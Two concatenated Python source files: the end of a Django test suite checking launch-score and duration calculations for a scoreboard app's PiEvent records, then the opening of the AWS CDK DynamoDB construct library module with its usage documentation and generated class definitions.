type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 7
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampFailSuccessSuccessFailWithConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 58).replace(tzinfo=utc),
type = PiEvent.EVENT_CONCLUDED_MSG_TYPE,
team = self.team1,
pi = self.station
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 7
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampFailSuccessFailSuccessNoConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 7
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampFailSuccessFailSuccessWithConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 58).replace(tzinfo=utc),
type = PiEvent.EVENT_CONCLUDED_MSG_TYPE,
team = self.team1,
pi = self.station
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 7
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampFailSuccessFailFailNoConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 6
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampFailSuccessFailFailWithConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 58).replace(tzinfo=utc),
type = PiEvent.EVENT_CONCLUDED_MSG_TYPE,
team = self.team1,
pi = self.station
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 6
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampFailFailSuccessSuccessNoConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 7
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampFailFailSuccessSuccessWithConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 58).replace(tzinfo=utc),
type = PiEvent.EVENT_CONCLUDED_MSG_TYPE,
team = self.team1,
pi = self.station
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 7
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampFailFailSuccessFailNoConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 6
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampFailFailSuccessFailWithConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 58).replace(tzinfo=utc),
type = PiEvent.EVENT_CONCLUDED_MSG_TYPE,
team = self.team1,
pi = self.station
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 6
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampFailFailFailSuccessNoConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 6
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampFailFailFailSuccessWithConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 58).replace(tzinfo=utc),
type = PiEvent.EVENT_CONCLUDED_MSG_TYPE,
team = self.team1,
pi = self.station
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 6
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampFourFailNoConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 5
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampFourFailWithConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 58).replace(tzinfo=utc),
type = PiEvent.EVENT_CONCLUDED_MSG_TYPE,
team = self.team1,
pi = self.station
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 5
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventLaterTimestamp(self, mock_utcNow):
pass # Don't worry about later timestamps
# File: .env/Lib/site-packages/aws_cdk/aws_dynamodb/__init__.py (MIT)
"""
## Amazon DynamoDB Construct Library
<!--BEGIN STABILITY BANNER-->---


---
<!--END STABILITY BANNER-->
Here is a minimal deployable DynamoDB table definition:
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
import aws_cdk.aws_dynamodb as dynamodb
table = dynamodb.Table(self, "Table",
partition_key=Attribute(name="id", type=dynamodb.AttributeType.STRING)
)
```
### Importing existing tables
To import an existing table into your CDK application, use the `Table.fromTableName`, `Table.fromTableArn` or `Table.fromTableAttributes`
factory methods. These accept a table name or table ARN describing the properties of an already
existing table:
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
table = Table.from_table_arn(self, "ImportedTable", "arn:aws:dynamodb:us-east-1:111111111:table/my-table")
# now you can just call methods on the table
table.grant_read_write_data(user)
```
If you intend to use the `tableStreamArn` (including indirectly, for example by creating an
`@aws-cdk/aws-lambda-event-source.DynamoEventSource` on the imported table), you *must* use the
`Table.fromTableAttributes` method and the `tableStreamArn` property *must* be populated.
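A minimal sketch of importing with attributes (the ARNs below are placeholders, not real resources):
```python
# Example sketch, not auto-generated; assumes placeholder ARNs
import aws_cdk.aws_dynamodb as dynamodb
table = dynamodb.Table.from_table_attributes(self, "ImportedTable",
    table_arn="arn:aws:dynamodb:us-east-1:111111111:table/my-table",
    # must be populated if the table's stream will be consumed (e.g. by DynamoEventSource)
    table_stream_arn="arn:aws:dynamodb:us-east-1:111111111:table/my-table/stream/2020-01-01T00:00:00.000"
)
```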
### Keys
When a table is defined, you must define its schema using the `partitionKey`
(required) and `sortKey` (optional) properties.
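A minimal sketch with both keys (the attribute names here are illustrative):
```python
# Example sketch, not auto-generated; attribute names are assumptions
import aws_cdk.aws_dynamodb as dynamodb
table = dynamodb.Table(self, "Table",
    # partitionKey is required; sortKey is optional and enables range queries
    partition_key=dynamodb.Attribute(name="id", type=dynamodb.AttributeType.STRING),
    sort_key=dynamodb.Attribute(name="createdAt", type=dynamodb.AttributeType.NUMBER)
)
```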
### Billing Mode
DynamoDB supports two billing modes:
* PROVISIONED - the default mode where the table and global secondary indexes have configured read and write capacity.
* PAY_PER_REQUEST - on-demand pricing and scaling. You only pay for what you use, and there is no configured read or write capacity for the table or its global secondary indexes.
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
import aws_cdk.aws_dynamodb as dynamodb
table = dynamodb.Table(self, "Table",
partition_key=Attribute(name="id", type=dynamodb.AttributeType.STRING),
billing_mode=dynamodb.BillingMode.PAY_PER_REQUEST
)
```
Further reading:
https://docs.aws.amazon.com/amazondynamodb/latest/developerguide/HowItWorks.ReadWriteCapacityMode.html
### Configure AutoScaling for your table
You can have DynamoDB automatically raise and lower the read and write capacities
of your table by setting up autoscaling. You can use this either to keep your
tables at a desired utilization level, or to scale up and down at preconfigured
times of the day:
Auto-scaling is only relevant for tables using the PROVISIONED billing mode.
```python
# Example automatically generated. See https://github.com/aws/jsii/issues/826
read_scaling = table.auto_scale_read_capacity(min_capacity=1, max_capacity=50)
read_scaling.scale_on_utilization(
target_utilization_percent=50
)
read_scaling.scale_on_schedule("ScaleUpInTheMorning",
schedule=appscaling.Schedule.cron(hour="8", minute="0"),
min_capacity=20
)
read_scaling.scale_on_schedule("ScaleDownAtNight",
schedule=appscaling.Schedule.cron(hour="20", minute="0"),
max_capacity=20
)
```
Further reading:
https://docs.aws.amazon.com/amazondynamodb/latest/developerguide/AutoScaling.html
https://aws.amazon.com/blogs/database/how-to-use-aws-cloudformation-to-configure-auto-scaling-for-amazon-dynamodb-tables-and-indexes/
### Amazon DynamoDB Global Tables
You can create DynamoDB Global Tables by setting the `replicationRegions` property on a `Table`:
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
import aws_cdk.aws_dynamodb as dynamodb
global_table = dynamodb.Table(self, "Table",
partition_key=Attribute(name="id", type=dynamodb.AttributeType.STRING),
replication_regions=["us-east-1", "us-east-2", "us-west-2"]
)
```
When doing so, a CloudFormation Custom Resource will be added to the stack in order to create the replica tables in the
selected regions.
### Encryption
All user data stored in Amazon DynamoDB is fully encrypted at rest. When creating a new table, you can choose one of the following customer master keys (CMK) to encrypt your table:
* AWS owned CMK - By default, all tables are encrypted under an AWS owned customer master key (CMK) in the DynamoDB service account (no additional charges apply).
* AWS managed CMK - AWS KMS keys (one per region) are created in your account, managed, and used on your behalf by AWS DynamoDB (AWS KMS charges apply).
* Customer managed CMK - You have full control over the KMS key used to encrypt the DynamoDB Table (AWS KMS charges apply).
Creating a Table encrypted with a customer managed CMK:
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
import aws_cdk.aws_dynamodb as dynamodb
table = dynamodb.Table(stack, "MyTable",
partition_key=Attribute(name="id", type=dynamodb.AttributeType.STRING),
encryption=TableEncryption.CUSTOMER_MANAGED
)
# You can access the CMK that was added to the stack on your behalf by the Table construct via:
table_encryption_key = table.encryption_key
```
You can also supply your own key:
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
import aws_cdk.aws_dynamodb as dynamodb
import aws_cdk.aws_kms as kms
encryption_key = kms.Key(stack, "Key",
enable_key_rotation=True
)
table = dynamodb.Table(stack, "MyTable",
partition_key=Attribute(name="id", type=dynamodb.AttributeType.STRING),
encryption=TableEncryption.CUSTOMER_MANAGED,
encryption_key=encryption_key
)
```
In order to use the AWS managed CMK instead, change the code to:
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
import aws_cdk.aws_dynamodb as dynamodb
table = dynamodb.Table(stack, "MyTable",
partition_key=Attribute(name="id", type=dynamodb.AttributeType.STRING),
encryption=TableEncryption.AWS_MANAGED
)
```
"""
import abc
import builtins
import datetime
import enum
import typing
import jsii
import jsii.compat
import publication
from ._jsii import *
import aws_cdk.aws_applicationautoscaling
import aws_cdk.aws_cloudwatch
import aws_cdk.aws_iam
import aws_cdk.aws_kms
import aws_cdk.core
@jsii.data_type(
jsii_type="@aws-cdk/aws-dynamodb.Attribute",
jsii_struct_bases=[],
name_mapping={"name": "name", "type": "type"},
)
class Attribute:
def __init__(self, *, name: str, type: "AttributeType") -> None:
"""Represents an attribute for describing the key schema for the table and indexes.
:param name: The name of an attribute.
:param type: The data type of an attribute.
"""
self._values = {
"name": name,
"type": type,
}
@builtins.property
def name(self) -> str:
"""The name of an attribute."""
return self._values.get("name")
@builtins.property
def type(self) -> "AttributeType":
"""The data type of an attribute."""
return self._values.get("type")
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return "Attribute(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.enum(jsii_type="@aws-cdk/aws-dynamodb.AttributeType")
class AttributeType(enum.Enum):
"""Data types for attributes within a table.
see
:see: https://docs.aws.amazon.com/amazondynamodb/latest/developerguide/HowItWorks.NamingRulesDataTypes.html#HowItWorks.DataTypes
"""
BINARY = "BINARY"
"""Up to 400KiB of binary data (which must be encoded as base64 before sending to DynamoDB)."""
NUMBER = "NUMBER"
"""Numeric values made of up to 38 digits (positive, negative or zero)."""
STRING = "STRING"
"""Up to 400KiB of UTF-8 encoded text."""
@jsii.enum(jsii_type="@aws-cdk/aws-dynamodb.BillingMode")
class BillingMode(enum.Enum):
"""DyanmoDB's Read/Write capacity modes."""
PAY_PER_REQUEST = "PAY_PER_REQUEST"
"""Pay only for what you use.
You don't configure Read/Write capacity units.
"""
PROVISIONED = "PROVISIONED"
"""Explicitly specified Read/Write capacity units."""
@jsii.implements(aws_cdk.core.IInspectable)
class CfnTable(
aws_cdk.core.CfnResource,
metaclass=jsii.JSIIMeta,
jsii_type="@aws-cdk/aws-dynamodb.CfnTable",
):
"""A CloudFormation ``AWS::DynamoDB::Table``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-dynamodb-table.html
cloudformationResource:
:cloudformationResource:: AWS::DynamoDB::Table
"""
def __init__(
self,
scope: aws_cdk.core.Construct,
id: str,
*,
key_schema: typing.Union[
aws_cdk.core.IResolvable,
typing.List[typing.Union["KeySchemaProperty", aws_cdk.core.IResolvable]],
],
attribute_definitions: typing.Optional[
typing.Union[
aws_cdk.core.IResolvable,
typing.List[
typing.Union[
aws_cdk.core.IResolvable, "AttributeDefinitionProperty"
]
],
]
] = None,
billing_mode: typing.Optional[str] = None,
global_secondary_indexes: typing.Optional[
typing.Union[
aws_cdk.core.IResolvable,
typing.List[
typing.Union[
aws_cdk.core.IResolvable, "GlobalSecondaryIndexProperty"
]
],
]
] = None,
local_secondary_indexes: typing.Optional[
typing.Union[
aws_cdk.core.IResolvable,
typing.List[
typing.Union[
aws_cdk.core.IResolvable, "LocalSecondaryIndexProperty"
]
],
]
] = None,
point_in_time_recovery_specification: typing.Optional[
typing.Union[
aws_cdk.core.IResolvable, "PointInTimeRecoverySpecificationProperty"
]
] = None,
provisioned_throughput: typing.Optional[
typing.Union[aws_cdk.core.IResolvable, "ProvisionedThroughputProperty"]
] = None,
sse_specification: typing.Optional[
typing.Union[aws_cdk.core.IResolvable, "SSESpecificationProperty"]
] = None,
stream_specification: typing.Optional[
typing.Union[aws_cdk.core.IResolvable, "StreamSpecificationProperty"]
] = None,
table_name: typing.Optional[str] = None,
tags: typing.Optional[typing.List[aws_cdk.core.CfnTag]] = None,
time_to_live_specification: typing.Optional[
typing.Union[aws_cdk.core.IResolvable, "TimeToLiveSpecificationProperty"]
] = None,
) -> None:
